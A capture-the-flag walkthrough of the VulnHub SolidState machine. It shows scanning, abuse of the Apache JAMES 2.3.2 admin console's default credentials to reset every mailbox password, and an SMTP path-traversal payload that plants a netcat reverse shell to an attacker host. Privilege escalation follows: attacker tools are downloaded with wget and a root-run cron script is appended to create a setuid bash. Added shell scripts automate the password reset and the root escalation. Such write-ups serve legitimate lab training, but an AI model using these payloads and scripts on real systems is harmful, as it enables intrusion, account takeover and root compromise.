Link: https://www.vulnhub.com/entry/solidstate-1,261/
1. Network discovery
2. Port scan
A default scan only covers nmap's top 1000 ports, so a second pass over ports 1000 and up is what reveals the JAMES admin console on 4555:
nmap -Pn 10.0.2.25
nmap -Pn -p1000- 10.0.2.25
3. OS and service scan
nmap -A -p22,25,80,110,119,4555 10.0.2.25
4. Vuln scan
nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25
5. Starting w/ port 80
Nikto
nikto -h http://10.0.2.25
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q
Access the site
View page source: nothing interesting.
services.html
Tried XSS in the form, but nothing happened.
Maybe the names on the site are usernames?
6. Next one is port 25: JAMES smtpd 2.3.2. Its remote administration console is the service on port 4555.
I came across this guide
The console accepts the default credentials root/root:
telnet 10.0.2.25 4555
Username: root
Password: root
HELP
listusers
I changed every account's password (1234 here) so I can read the mailboxes:
setpassword <username> 1234
Access these accounts w/ the POP3 service on port 110 using Thunderbird.
John: there's 1 message.
Mindy: there are 2 messages.
Mindy's mail contains her SSH username and password.
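The console steps above (log in as root/root, listusers, setpassword for each account) as a script instead of an interactive telnet session. This is an added example, not part of the original writeup: the host and the root/root credentials are the walkthrough's, the function names and the "user: name" output format the parser expects are my assumptions about the JAMES 2.3.2 console.

```shell
#!/bin/sh
# Added example: drive the JAMES Remote Administration Tool (TCP/4555)
# non-interactively. The console reads the username and password as the
# first two lines, then one command per line, and "quit" closes the session.

# Build the line-oriented script the console expects.
james_admin_script() {
    user="$1"; pass="$2"; shift 2
    printf '%s\n%s\n' "$user" "$pass"
    for cmd in "$@"; do
        printf '%s\n' "$cmd"
    done
    printf 'quit\n'
}

# Pull account names out of "listusers" output, which (assumption) looks like
#   Existing accounts 2
#   user: john
#   user: mindy
james_parse_users() {
    sed -n 's/^user: //p'
}

# Run one console session against the target and return its output.
james_admin() {
    host="$1"; shift
    james_admin_script "$@" | nc -w 5 "$host" 4555
}

# Reset every account to one known password so all mailboxes can be read
# over POP3; this is what the walkthrough did by hand with setpassword.
# Note that this is noisy and destructive: real users lose their passwords.
james_reset_all() {
    host="$1"; newpass="$2"
    for u in $(james_admin "$host" root root listusers | james_parse_users); do
        james_admin "$host" root root "setpassword $u $newpass"
    done
}

# Usage (not run on load): james_reset_all 10.0.2.25 1234
```

Each setpassword runs in its own session, which keeps the output per account readable; the default credentials are the only reason this works, so changing them (or firewalling 4555) is the fix on the defending side.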
7. Login w/ mindy's credentials
ssh mindy@10.0.2.25
ls -la
cat user.txt
Try exploring system
cd ..
Restricted.
Read passwd
cat /etc/passwd
Mindy's login shell is rbash (restricted bash), so cd, redirection and anything outside the allowed PATH are blocked; I cannot do much from here.
8. James 2.3.2: get back to the exploitation guide
Follow the guide. In the 4555 admin console, create a user whose name is a path traversal, so the account's mailbox directory ends up being /etc/bash_completion.d (bash sources every file in there on an interactive login):
adduser ../../../../../../../../etc/bash_completion.d password
I have to supply the reverse shell command that will run when the mail file is sourced.
Prepare a listener on port 443
rlwrap nc -lvp 443
Connect to port 25
telnet 10.0.2.25 25
Following the guide and a reverse shell cheatsheet (the single quote in MAIL FROM opens a quoted string in the stored mail file; the quote in the From: line closes it, and the rest of that line is executed):
EHLO bla.bla
MAIL FROM: <'you@domain.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f

.
Login w/ mindy again. On login bash sources the mail file from /etc/bash_completion.d, so you will see some weird errors from the mail headers, and the reverse shell fires.
ssh mindy@10.0.2.25
Back to listener, now I have a shell
whoami
9. Privilege escalation
I need TTY shell.
python -c 'import pty;pty.spawn("/bin/bash");'
I want to run LinEnum.sh
Prepare SimpleHTTPServer on attacker machine
python -m SimpleHTTPServer 80
Download the script
cd /tmp
wget http://10.0.2.27/LinEnum.sh
Change permissions and run (execute permission is all it needs; 777 is just habit)
chmod 777 LinEnum.sh
/tmp/LinEnum.sh -t
The machine is 32-bit.
There's /opt/tmp.py -> very interesting.
Nothing I can do with the other files LinEnum listed.
Nothing on SUID/SGID.
Nothing visible in cron (the system crontabs show nothing useful, and root's crontab is unreadable).
Verify sudo
sudo -l
No commands allowed.
Verify capabilities
getcap -r / 2>/dev/null
Let’s check some services beside cron job
ps aux | grep "^root"
I found this ‘cron -f’. There must have something running in the background.
Observe the system w/ pspy
This machine is 32-bit, so I download pspy32 to the machine.
wget http://10.0.2.27/pspy32
chmod 777 pspy32
/tmp/pspy32
After watching for a while I got this: root runs '/opt/tmp.py' periodically.
Read the file.
cd /opt
cat tmp.py
The file is writable by me, so I can append this line (it runs as root on the next cron run) to get a root shell:
echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.py
cat tmp.py
Waiting for a while
cd /tmp
ls -la
Now I got /tmp/rootbash (setuid root).
Run it w/ -p so bash keeps the effective uid instead of dropping it at startup
/tmp/rootbash -p
whoami
Now I’m root
Get root.txt
cd /root
ls -la
cat root.txt
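The privilege escalation above (append to the root-run cron script, wait for the setuid copy of bash, run it with -p) as shell functions with the checks worth doing first. This is an added example, not the walkthrough's own code: /opt/tmp.py, /tmp/rootbash and the payload line are the walkthrough's; the marker comment, the timeout and the function names are my assumptions.

```shell
#!/bin/sh
# Added example: writable root-owned cron script -> setuid bash, with checks.

# Refuse to touch the script unless it is writable by us and owned by root
# (if it were owned by someone else, cron would not run our line as root).
check_target_script() {
    script="$1"
    [ -f "$script" ] && [ -w "$script" ] || return 1
    [ "$(stat -c %U "$script")" = root ] || return 2
}

# Append the payload exactly once; re-running must not stack duplicate lines
# in a file a defender may later read.
append_payload_once() {
    script="$1"; marker="$2"; payload="$3"
    grep -qF -- "$marker" "$script" && return 0
    printf '%s  # %s\n' "$payload" "$marker" >> "$script"
}

# Poll for the setuid binary the cron job drops; give up after $2 seconds.
wait_for_suid() {
    path="$1"; timeout="$2"; waited=0
    while [ "$waited" -lt "$timeout" ]; do
        [ -u "$path" ] && return 0
        sleep 1; waited=$((waited + 1))
    done
    [ -u "$path" ]
}

# The line from the walkthrough; valid Python appended to tmp.py.
ROOTBASH_PAYLOAD='os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")'

get_root() {
    check_target_script /opt/tmp.py || { echo 'tmp.py is not writable and root-owned' >&2; return 1; }
    append_payload_once /opt/tmp.py 'added-by-me' "$ROOTBASH_PAYLOAD"
    # cron fires on its own schedule (pspy showed it recurring); 300 s is a guess.
    wait_for_suid /tmp/rootbash 300 || { echo 'cron job did not run yet' >&2; return 1; }
    # -p keeps the effective uid 0 instead of bash dropping privileges at start.
    exec /tmp/rootbash -p
}

# Usage (not run on load): get_root
```

The `-u` test is the check that matters: a copied bash without the setuid bit (for example if the script ran as a non-root user) gives a normal shell, and `whoami` would still say mindy.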